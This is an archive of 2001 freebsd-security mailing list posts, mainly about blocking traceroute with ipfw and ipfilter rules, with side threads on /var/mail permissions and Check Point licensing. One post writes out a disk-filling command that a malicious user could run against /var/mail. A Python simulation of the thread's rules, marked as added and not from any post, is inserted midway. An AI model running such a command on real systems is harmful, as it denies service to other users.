> > DES > -- > Dag-Erling Smorgrav - des@ofug.org > > * It went a bit like this: Friend: "Sun have this new firewall product > that's really cool, it can do blah blah blah" - Me: "Oh, FreeBSD can > do that" - Friend: "No, it can't" - Me: "Yes, it can" - Friend: "No > it can't, because blah blah blah" - Me: "Oh, I see" > "Now FreeBSD can do that too" - Friend: > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 12:50:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 8AED337B406 for ; Mon, 25 Jun 2001 12:50:31 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 14140 invoked from network); 25 Jun 2001 19:51:19 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 25 Jun 2001 19:51:19 -0000 Message-ID: <017a01c0fdb0$1ff51240$9865fea9@book> From: "alexus" To: "Igor Podlesny" Cc: , References: <006a01c0fb6b$2d64d830$9865fea9@book> <13760134158.20010623111308@morning.ru> Subject: Re: disable traceroute to my host Date: Mon, 25 Jun 2001 15:50:45 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org thanks a lot for this whole explanation, i appreciate everyone on the list for taking time to explain how basics works.. 
i'm trying to read books, manuals, internet for all those things but not everything makes sense, although when a real person explains it helps me a lot better thanks everyone ----- Original Message ----- From: "Igor Podlesny" To: "alexus" Cc: ; Sent: Saturday, June 23, 2001 12:13 AM Subject: Re: disable traceroute to my host > > > is it possible to disable using ipfw so people won't be able to traceroute > > me? > > Yes, of course. > > You should know how traceroute-like utilities work. > > The knowledge can be easily extracted from a lot of sources, e.g. > from the Internet, cause you seem to be connected ;) but, it also should > be mentioned that the man pages coming with FreeBSD (I guess as well as > with other *NIX-like OSes) also describe the algo. > > so man traceroute says that it uses udp ports starting with 33434 and > goes up with every new hop. but this could be easily changed with the -p > option. Besides, windows' tracert works using the icmp proto, so the > decision isn't here. It lies in what the box does when answering > them. It does send a 'time exceeded in-transit' icmp message cause the TTL > value is set too low to let the packet jump forward. So that is the > answer -- you should disallow it with your ipfw. e.g. using such > syntax: > > deny icmp from any to any icmptype 11 > > (yeah, you should carefully think about whether or not to use ANY > cause if your box is a gateway other people will notice your > cutting-edge knowledge cause it will hide not only your host ;) > > This is not the end, alas. unix traceroute will wait for a port unreach > icmp so after meeting it, it stops and displays the end-point of your > trace. Windows' tracert will wait for a normal icmp-echo-reply for the > same purpose. So if you also wish to hide the end point, you need to > disallow this also. I bet you can figure out the way how by yourself, > now. > > P.S. there are also other ways (even more elegant) of doing that in > practice... 
they called 'stealth routing' and can be implemented via > FreeBSD kernel mechanism (sysctl + built-in kernel support) or with > ipf (ipfilter) > > read the man pages, man, they are freely available... > > -- > Igor mailto:poige@morning.ru > http://poige.nm.ru > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 12:52:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 27C1C37B401 for ; Mon, 25 Jun 2001 12:52:39 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 14186 invoked from network); 25 Jun 2001 19:53:27 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 25 Jun 2001 19:53:27 -0000 Message-ID: <018601c0fdb0$6c00b130$9865fea9@book> From: "alexus" To: "Peter Pentchev" , "Fernando Gleiser" Cc: References: <006a01c0fb6b$2d64d830$9865fea9@book> <20010622221554.K5703-100000@cactus.fi.uba.ar> <20010623143419.A29940@ringworld.oblivion.bg> Subject: Re: disable traceroute to my host Date: Mon, 25 Jun 2001 15:52:53 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i can't just block whole icmp .. or udp.. i just can't.. i only wanted to block certain range,type whatever was that just for traceroute .. but i was thinking .. and yes I won't gain much (infact nothing) so ... the max thing i'll do is disable ttl=1.. this should cover the trick.. 
----- Original Message ----- From: "Peter Pentchev" To: "Fernando Gleiser" Cc: "alexus" ; Sent: Saturday, June 23, 2001 7:34 AM Subject: Re: disable traceroute to my host > On Fri, Jun 22, 2001 at 10:23:30PM -0300, Fernando Gleiser wrote: > > On Fri, 22 Jun 2001, alexus wrote: > > > > > is it possible to disable using ipfw so people won't be able to traceroute > > > me? > > > > I don't know if it is posible with ipfw, but with ip filter you can add > > a rule to block any packets with ttl=1: > > > > block in log quick on xl0 ttl 1 proto ip all > > > > That will stop windows traceroute (icmp based) as well as unix traceroute > > (udp based). > > > > Unix traceroute uses udp packets with destination port > 33434, but this can > > be changed. As far as I know, the only way to stop traceroute is to drop > > any packet with ttl=1. This might block legitimate trafic, but I haven't > > seen any packet in the wild with ttl=1 wich was not a traceroute. > > This shall only stop traceroutes destined for this particular machine. > If you tried this on a firewall/gateway machine, it would block the response > from the gateway itself, but the internal machines would still respond. > > The response from Igor Podlesny in the thread contains a much more > effective approach, which might block a bit too much, but it would > certainly block traceroutes. > > Oh and BTW, blocking all packets with ttl=1 could block some legitimate > packets that have simply gone down the long and winding road, and stopped > at too many auberges to rest along the way :) > > G'luck, > Peter > > -- > If wishes were fishes, the antecedent of this conditional would be true. 
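The mechanics argued over in the messages above (Igor Podlesny's "deny icmp from any to any icmptype 11", Fernando Gleiser's ipfilter "ttl 1" block and Peter Pentchev's gateway caveat, Dag-Erling Smorgrav's points about ICMP types and stealth forwarding, Jewfish's ipfw rules, and the UDP port rule Simon Rakovec posts later in the thread) can be checked against a small model. The Python below is an added example, not code from any post and not from FreeBSD, ipfw or ipf: the four-hop topology, the host names r1/r2/fw/inside, the Rule objects and the accept-by-default policy are all constructed for illustration, and the model covers only TTL handling and the ICMP replies traceroute depends on, not the real filters' syntax or state.

```python
"""Toy model of what the filter rules proposed in this thread do to a traceroute.
Added example, not code from any post: topology, names, rule objects and the
accept-by-default policy are constructed.  tracer -> r1 -> r2 -> fw -> inside,
where fw is the FreeBSD box running the filter and inside is a host behind it.
A router that decrements a probe's TTL to zero answers ICMP type 11; the final
host answers a UDP probe with ICMP type 3 (port unreachable) and an ICMP echo
probe with type 0, and that answer is how the tracer knows it has arrived."""
from dataclasses import dataclass, replace

PATH = ["r1", "r2", "fw", "inside"]
FW = "fw"

@dataclass
class Probe:
    ttl: int            # remaining TTL as the probe travels
    proto: str          # "udp" (unix traceroute) or "icmp" (windows tracert)
    dst: str
    dport: int = 0      # UDP destination port; unused for ICMP probes
    icmptype: int = 8   # echo request; only meaningful when proto == "icmp"

@dataclass
class Reply:
    src: str
    icmptype: int       # 11 time exceeded, 3 port unreachable, 0 echo reply

@dataclass
class Rule:
    action: str         # "allow" or "deny"; a None field below means "don't care"
    proto: str = "ip"   # "ip" matches every protocol
    direction: str = None       # "in", "out" or None for both
    icmptypes: set = None       # ICMP types to match
    dports: tuple = None        # inclusive (lo, hi) on the UDP destination port
    ttl: int = None             # TTL of the packet as it arrives at fw

    def matches(self, pkt, direction):
        proto = "icmp" if isinstance(pkt, Reply) else pkt.proto
        if (self.direction and self.direction != direction) or self.proto not in ("ip", proto):
            return False
        if self.icmptypes is not None and (proto != "icmp" or pkt.icmptype not in self.icmptypes):
            return False
        if self.dports is not None and (proto != "udp" or not self.dports[0] <= pkt.dport <= self.dports[1]):
            return False
        if self.ttl is not None and (isinstance(pkt, Reply) or pkt.ttl != self.ttl):
            return False
        return True

def filter_passes(rules, pkt, direction):
    """First matching rule wins; no match means accept (toy default policy)."""
    for rule in rules:
        if rule.matches(pkt, direction):
            return rule.action == "allow"
    return True

def leave_via_fw(reply, hop, rules):
    """Replies from fw itself or from anything behind it cross fw's outbound filter."""
    if PATH.index(hop) >= PATH.index(FW) and not filter_passes(rules, reply, "out"):
        return None
    return reply

def send_probe(probe, rules, stealth):
    """Walk one probe along PATH; return the reply the tracer gets, or None."""
    for hop in PATH:
        if hop == FW and not filter_passes(rules, probe, "in"):
            return None               # dropped on arrival at the firewall
        if hop == probe.dst:          # locally delivered: TTL is not decremented
            return leave_via_fw(Reply(hop, 3 if probe.proto == "udp" else 0), hop, rules)
        if hop == FW and stealth:     # IPSTEALTH-style forwarding: TTL untouched
            continue
        probe = replace(probe, ttl=probe.ttl - 1)
        if probe.ttl == 0:
            return leave_via_fw(Reply(hop, 11), hop, rules)
    return None

def traceroute(dst, rules=(), proto="udp", stealth=False, base_port=33434, max_hops=6):
    """Hop list as the tracer would print it; '*' is an unanswered probe."""
    hops = []
    for ttl in range(1, max_hops + 1):
        reply = send_probe(Probe(ttl, proto, dst, base_port + ttl - 1), rules, stealth)
        hops.append("*" if reply is None else reply.src)
        if reply is not None and reply.icmptype in (0, 3):   # destination answered
            break
    return hops

# The rulesets proposed in the thread, transcribed into the toy rule objects.
RULESETS = {
    "no filter": [],
    # Igor Podlesny: deny icmp from any to any icmptype 11
    "deny icmp type 11": [Rule("deny", "icmp", icmptypes={11})],
    # Fernando Gleiser (ipfilter): block in log quick on xl0 ttl 1 proto ip all
    "block in ttl 1": [Rule("deny", "ip", direction="in", ttl=1)],
    # Simon Rakovec: deny udp from any 32769-65535 to 33434-33523
    "deny udp 33434-33523": [Rule("deny", "udp", dports=(33434, 33523))],
    # Jewfish: allow a few inbound ICMP types and outbound echo, deny other ICMP
    "jewfish": [Rule("allow", "icmp", "in", {0, 3, 11, 14, 16, 18}),
                Rule("allow", "icmp", "out", {8}), Rule("deny", "icmp")],
}

if __name__ == "__main__":
    for name, rules in RULESETS.items():
        for dst, proto in (("fw", "udp"), ("fw", "icmp"), ("inside", "udp")):
            print(f"{name:22} {proto:4} -> {dst:7} {traceroute(dst, rules, proto)}")
    print("udp -p 40000 vs port rule:", traceroute("fw", RULESETS["deny udp 33434-33523"], base_port=40000))
    print("stealth forwarding, to inside:", traceroute("inside", stealth=True))
```

Running it reproduces what the thread concludes: every rule at best turns the box into a "*" while the hops in front of it stay visible; denying type 11 alone still lets the endpoint answer with port unreachable; the "ttl 1" block only moves the box's answer to the next probe, which arrives with TTL 2, and leaves inside hosts answering; the UDP port rule does nothing against tracert or against traceroute -p 40000; Jewfish's ruleset hides both fw and inside but also drops every type 3 the box would send; and stealth forwarding hides fw only from traces that pass through it to inside.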
> > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 12:55:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id CBEF537B406 for ; Mon, 25 Jun 2001 12:55:39 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 14256 invoked from network); 25 Jun 2001 19:56:28 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 25 Jun 2001 19:56:28 -0000 Message-ID: <01a401c0fdb0$d790b3f0$9865fea9@book> From: "alexus" To: "Jewfish" , "Igor Podlesny" Cc: , References: <006a01c0fb6b$2d64d830$9865fea9@book> <13760134158.20010623111308@morning.ru> <3B34EEC8.9010606@jewfish.net> Subject: Re: disable traceroute to my host Date: Mon, 25 Jun 2001 15:55:53 -0400 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_01A1_01C0FD8F.505F08D0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org
is there any place on internet where all protocols are described .. like icmp and all types of icmps? i'd love to read about that
----- Original Message ----- From: Jewfish To: Igor Podlesny Cc: alexus ; freebsd-security@FreeBSD.ORG ; freebsd-isp@FreeBSD.ORG Sent: Saturday, June 23, 2001 3:32 PM Subject: Re: disable traceroute to my host
These are the rules I have come up with on my own firewall to disable tracerouting and pinging (something which might not be for everybody), but allows me to traceroute and ping from the host and receive all the responses:
allow icmp from any to any in recv ep0 icmptype 0,3,11,14,16,18
allow icmp from any to any out xmit ep0 icmptype 8
ep0 being, of course, my external interface. This seems to work quite well for me. Some other ideas were brought up about denying the "time-to-live-exceeded" icmptype (11) because of packets that may take a long time to reach the host. However, this is the easiest method I could come up with using firewall rules.
Obviously, these rules also deny ping traffic, which is not recommended for everyone. However, I have recently gotten a lot of ping floods, so I enacted this (possibly on a temporary basis) to deal with this, while still allowing me to ping out (icmptype 8) and receive the replies (icmptype 0).
James
Igor Podlesny wrote: is it possible to disable using ipfw so people won't be able to traceroute me? Yes, of course. You should know how traceroute-like utilities work. The knowledge can be easily extracted from a lot of sources, e.g. from the Internet, cause you seem to be connected ;) but, it also should be mentioned that the man pages coming with FreeBSD (I guess as well as with other *NIX-like OSes) also describe the algo. so man traceroute says that it uses udp ports starting with 33434 and goes up with every new hop. but this could be easily changed with the -p option. Besides, windows' tracert works using the icmp proto, so the decision isn't here. It lies in what the box does when answering them. It does send a 'time exceeded in-transit' icmp message cause the TTL value is set too low to let the packet jump forward. So that is the answer -- you should disallow it with your ipfw. e.g. using such syntax: deny icmp from any to any icmptype 11 (yeah, you should carefully think about whether or not to use ANY cause if your box is a gateway other people will notice your cutting-edge knowledge cause it will hide not only your host ;) This is not the end, alas. unix traceroute will wait for a port unreach icmp so after meeting it, it stops and displays the end-point of your trace. Windows' tracert will wait for a normal icmp-echo-reply for the same purpose. So if you also wish to hide the end point, you need to disallow this also. I bet you can figure out the way how by yourself, now. P.S. there are also other ways (even more elegant) of doing that in practice... they are called 'stealth routing' and can be implemented via FreeBSD kernel mechanism (sysctl + built-in kernel support) or with ipf (ipfilter) read the man pages, man, they are freely available...
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 12:56:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 2B8D437B407 for ; Mon, 25 Jun 2001 12:56:07 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 14281 invoked from network); 25 Jun 2001 19:56:55 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 25 Jun 2001 19:56:55 -0000 Message-ID: <01ae01c0fdb0$e7eb8fe0$9865fea9@book> From: "alexus" To: "Brian" , "Jewfish" , "Igor Podlesny" Cc: , References: <006a01c0fb6b$2d64d830$9865fea9@book> <13760134158.20010623111308@morning.ru> <3B34EEC8.9010606@jewfish.net> <003d01c0fc30$053716a0$3324200a@sonicboom.org> Subject: Re: disable traceroute to my host Date: Mon, 25 Jun 2001 15:56:21 -0400 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_01AB_01C0FD8F.60AF3660" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org
well basically i wanted to block all traceroute .. whether it's windows or unix
----- Original Message ----- From: Brian To: Jewfish ; Igor Podlesny Cc: alexus ; freebsd-security@FreeBSD.ORG ; freebsd-isp@FreeBSD.ORG Sent: Saturday, June 23, 2001 6:01 PM Subject: Re: disable traceroute to my host
Aren't you leaving out some details, like for example windows tracert is icmp based, whereas unix traces are udp.. Bri
----- Original Message ----- From: Jewfish To: Igor Podlesny Cc: alexus ; freebsd-security@FreeBSD.ORG ; freebsd-isp@FreeBSD.ORG Sent: Saturday, June 23, 2001 12:32 PM Subject: Re: disable traceroute to my host
These are the rules I have come up with on my own firewall to disable tracerouting and pinging (something which might not be for everybody), but allows me to traceroute and ping from the host and receive all the responses:
allow icmp from any to any in recv ep0 icmptype 0,3,11,14,16,18
allow icmp from any to any out xmit ep0 icmptype 8
ep0 being, of course, my external interface. This seems to work quite well for me. Some other ideas were brought up about denying the "time-to-live-exceeded" icmptype (11) because of packets that may take a long time to reach the host. However, this is the easiest method I could come up with using firewall rules.
Obviously, these rules also deny ping traffic, which is not recommended for everyone. However, I have recently gotten a lot of ping floods, so I enacted this (possibly on a temporary basis) to deal with this, while still allowing me to ping out (icmptype 8) and receive the replies (icmptype 0).
James
Igor Podlesny wrote: is it possible to disable using ipfw so people won't be able to traceroute me? Yes, of course. You should know how traceroute-like utilities work. The knowledge can be easily extracted from a lot of sources, e.g. from the Internet, cause you seem to be connected ;) but, it also should be mentioned that the man pages coming with FreeBSD (I guess as well as with other *NIX-like OSes) also describe the algo. so man traceroute says that it uses udp ports starting with 33434 and goes up with every new hop. but this could be easily changed with the -p option. Besides, windows' tracert works using the icmp proto, so the decision isn't here. It lies in what the box does when answering them. It does send a 'time exceeded in-transit' icmp message cause the TTL value is set too low to let the packet jump forward. So that is the answer -- you should disallow it with your ipfw. e.g. using such syntax: deny icmp from any to any icmptype 11 (yeah, you should carefully think about whether or not to use ANY cause if your box is a gateway other people will notice your cutting-edge knowledge cause it will hide not only your host ;) This is not the end, alas. unix traceroute will wait for a port unreach icmp so after meeting it, it stops and displays the end-point of your trace. Windows' tracert will wait for a normal icmp-echo-reply for the same purpose. So if you also wish to hide the end point, you need to disallow this also. I bet you can figure out the way how by yourself, now. P.S. there are also other ways (even more elegant) of doing that in practice... they are called 'stealth routing' and can be implemented via FreeBSD kernel mechanism (sysctl + built-in kernel support) or with ipf (ipfilter) read the man pages, man, they are freely available...
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 12:59:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id DDD4137B401 for ; Mon, 25 Jun 2001 12:59:49 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 14388 invoked from network); 25 Jun 2001 20:00:38 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 25 Jun 2001 20:00:38 -0000 Message-ID: <01ec01c0fdb1$6c9cada0$9865fea9@book> From: "alexus" To: "Peter Pentchev" , "Simon Rakovec" Cc: References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> <20010625093731.A934@ringworld.oblivion.bg> Subject: Re: disable traceroute to my host Date: Mon, 25 Jun 2001 16:00:03 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i agree this is not a solution.. looks like ttl=1 is best solution so far thanks though ----- Original Message ----- From: "Peter Pentchev" To: "Simon Rakovec" Cc: Sent: Monday, June 25, 2001 2:37 AM Subject: Re: disable traceroute to my host > On Sun, Jun 24, 2001 at 07:42:19PM +0200, Simon Rakovec wrote: > > Try this: > > > > ipfw add deny udp from any 32769-65535 to 33434-33523 > > As Karsten noted in a followup, this is not proper network practice. > There might be a LOT of things listening on those UDP ports, including > ephemeral outgoing UDP connections. 
> > As many other people noted, this does not stop Windows traceroute, > which goes via ICMP. > > As the traceroute(8) manpage notes, this does not stop people who > know how to use the traceroute '-p port' option to select a starting > port != 32768. > > As Dag-Erling Smoerdgrav noted, in general it is impossible to disable > a person determined to traceroute you, and in practice, there is > no need to. > > G'luck, > Peter > > PS. How was that now... one source: plagiarism, two sources: comparative > study, three sources: an academic thesis.. I did even better than that! ;) > > -- > Thit sentence is not self-referential because "thit" is not a word. > > > alexus wrote: > > > > > > is it possible to disable using ipfw so people won't be able to traceroute > > > me? > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 13: 4: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from NOC.maKintosh.com (maKintosh.com [208.188.197.97]) by hub.freebsd.org (Postfix) with ESMTP id 4612237B401 for ; Mon, 25 Jun 2001 13:04:04 -0700 (PDT) (envelope-from co0kie@maKintosh.com) Received: by NOC.maKintosh.com (Postfix, from userid 1005) id B778E1068; Mon, 25 Jun 2001 14:57:38 -0500 (CDT) Date: Mon, 25 Jun 2001 14:57:38 -0500 From: co0kie bawx To: freebsd-security@FreeBSD.ORG Cc: ml@db.nexgen.com Subject: Re: disable traceroute to my host Message-ID: <20010625145738.A1282@NOC.maKintosh.com> References: <006a01c0fb6b$2d64d830$9865fea9@book> <13760134158.20010623111308@morning.ru> <3B34EEC8.9010606@jewfish.net> <01a401c0fdb0$d790b3f0$9865fea9@book> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: 
inline User-Agent: Mutt/1.2.4i In-Reply-To: <01a401c0fdb0$d790b3f0$9865fea9@book>; from ml@db.nexgen.com on Mon, Jun 25, 2001 at 03:55:53PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Please try to answer some of your own questions first, before you post 11 questions, in 11 different posts to the list. There are alternative methods to find knowledge, rather than being lazy and expecting it from other people. .co0kie To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 25 13: 6:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id D10A737B405 for ; Mon, 25 Jun 2001 13:06:09 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 90035 invoked by uid 1001); 25 Jun 2001 20:06:07 +0000 (GMT) To: ml@db.nexgen.com Cc: freebsd-security@FreeBSD.ORG, freebsd-isp@FreeBSD.ORG Subject: Re: disable traceroute to my host From: sthaug@nethelp.no In-Reply-To: Your message of "Mon, 25 Jun 2001 15:55:53 -0400" References: <01a401c0fdb0$d790b3f0$9865fea9@book> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Mon, 25 Jun 2001 22:06:07 +0200 Message-ID: <90033.993499567@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > is there any place on internet where all protocols desicrbed .. like icmp and all types of icmps? i'd love to read about that www.rfc-editor.org is a good place to start. 
Steinar Haug, Nethelp consulting, sthaug@nethelp.no

From owner-freebsd-security Mon Jun 25 13:10:10 2001
From: "alexus"
Subject: Re: disable traceroute to my host
Date: Mon, 25 Jun 2001 16:10:14 -0400
Message-ID: <027401c0fdb2$d8d7ef10$9865fea9@book>
References: <01a401c0fdb0$d790b3f0$9865fea9@book> <90033.993499567@verdi.nethelp.no>

thank you

----- Original Message -----
Sent: Monday, June 25, 2001 4:06 PM
Subject: Re: disable traceroute to my host

> > is there any place on internet where all protocols described .. like icmp
> > and all types of icmps? i'd love to read about that
>
> www.rfc-editor.org
>
> is a good place to start.
>
> Steinar Haug, Nethelp consulting, sthaug@nethelp.no

From owner-freebsd-security Mon Jun 25 14:41:01 2001
From: faSty
To: Jason DiCioccio
Cc: freebsd-security@freebsd.org
Subject: Re: "Correct" permissions on /var/mail?
Date: Mon, 25 Jun 2001 14:48:39 -0700
Message-ID: <20010625144839.C94318@i-sphere.com>
In-Reply-To: <657B20E93E93D4118F9700D0B73CE3EA0166D9B4@goofy.epylon.lan>

True, I would terminate the customer's account out of my server. simple

-trev

On Mon, Jun 25, 2001 at 09:58:51AM -0700, Jason DiCioccio wrote:
> I use the freebsd default, although someone could still fill up /var
> if they wanted to.. (cat /dev/urandom >/var/mail/`whoami`)
>
> But 1777 they could create extra files, no? I'd rather not have a
> second /tmp..
>
> Cheers,
> -JD-
>
> -----Original Message-----
> From: Leonard Chung [mailto:leonard@ssl.berkeley.edu]
> Sent: Sunday, June 24, 2001 2:12 PM
> To: security@FreeBSD.ORG
> Subject: "Correct" permissions on /var/mail?
>
> I was having a debate with a colleague the other day on the correct mode
> for /var/mail. He claimed that 1777 is more secure than what I've always
> had (the FreeBSD default of root:mail 775).
>
> 1777 gives you the additional benefit of protecting you from compromises on
> the mail group, but requires that on every machine quotas be installed even
> for machines with just one or two users. Without quotas, a malicious user
> could fill up /var/mail creating a DoS for everybody receiving mail off
> that machine. 775 doesn't protect against compromises of the mail group,
> but has the added benefit that it protects against a user filling /var/mail
> inadvertently as they would have to purposely send lots of e-mail.
>
> Which do most of you use? Is there a reason /var/mail is initially set to
> 775 rather than 1777?
>
> Thanks,
>
> Leonard
>
> --
> Leonard Chung -
> SETI@home - The Search for Extraterrestrial Intelligence @ home
> http://www.setiathome.ssl.berkeley.edu

From owner-freebsd-security Mon Jun 25 14:41:50 2001
From: "Karsten W. Rohrbach"
To: Nate Williams
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: disable traceroute to my host
Date: Mon, 25 Jun 2001 23:42:04 +0200
Message-ID: <20010625234204.A13392@mail.webmonster.de>
In-Reply-To: <15159.37721.944609.942116@nomad.yogotech.com>

Nate Williams(nate@yogotech.com)@2001.06.25 13:39:05 +0000:
> > hehe, reminds me of this customer's nokia ip-330 sitting in the corner
> > of my lab -- i probably will wipe ipso and this weird-ass checkpoint
> > fw1, replace it with freebsd and ipfilter :->
>
> Except you'd be replacing the ip-330 running FreeBSD with another box
> running FreeBSD.
>
you know, it _would_ be a great product if the licensing would actually
_work_ and the versioning trail would be well-documented. it's not the
hardware, not the os, it's the whole dist and licensing concept. the
checkpoint support people just keep giving me versions of the install
package, different every time, and they go like this: "well, yes, the
license you bought is for feature set bla-bla-3des-cpvig-bummer-25 and your
installed package is *-des-* so you need the *-strong-* version from ftp
url blabla". it won't work. they get back to me after my next bug report
and tell me to switch it back to the other version then.
i tell them to supply me the version they actually _mean_ and it has the
same filename for the package, same version but different md5sum. what kind
of fucked up release engineering is that? i have used freebsd for years now
and i never had such problems, everything's documented and so on

but now i stop whining and get back to my really hard after-work job: it is
half past eleven pm and i need to get drunk until midnight to forget all
that crap of the last days ;-)

> Nate (or Nate.Williams@nokia.com ;)

i see, i get back to you off-list and describe the scenario if you wish.
perhaps there's something we can do about all that stuff...

/k

--
> Only two things are infinite, the universe and human stupidity, and I'm
> not sure about the former. --Albert Einstein
KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie
http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/
karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de
GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46
Please do not remove my address from To: and Cc: fields in mailing lists.
From owner-freebsd-security Mon Jun 25 14:47:43 2001
From: Nate Williams
Reply-To: nate@yogotech.com (Nate Williams)
Date: Mon, 25 Jun 2001 15:47:36 -0600 (MDT)
Message-ID: <15159.45432.759210.854416@nomad.yogotech.com>
To: "Karsten W. Rohrbach"
Cc: Nate Williams, freebsd-security@FreeBSD.ORG
Subject: Re: disable traceroute to my host
In-Reply-To: <20010625234204.A13392@mail.webmonster.de>

> > > hehe, reminds me of this customer's nokia ip-330 sitting in the corner
> > > of my lab -- i probably will wipe ipso and this weird-ass checkpoint
> > > fw1, replace it with freebsd and ipfilter :->
> >
> > Except you'd be replacing the ip-330 running FreeBSD with another box
> > running FreeBSD.
>
> you know, it _would_ be a great product if the licensing would actually
> _work_ and the versioning trail would be well-documented.

I'm not in the division that makes that box, although I've spoken with a
couple of them. As I understand it, the CheckPoint stuff is the biggest
nightmare of the entire product line.
Nate

From owner-freebsd-security Mon Jun 25 22:53:27 2001
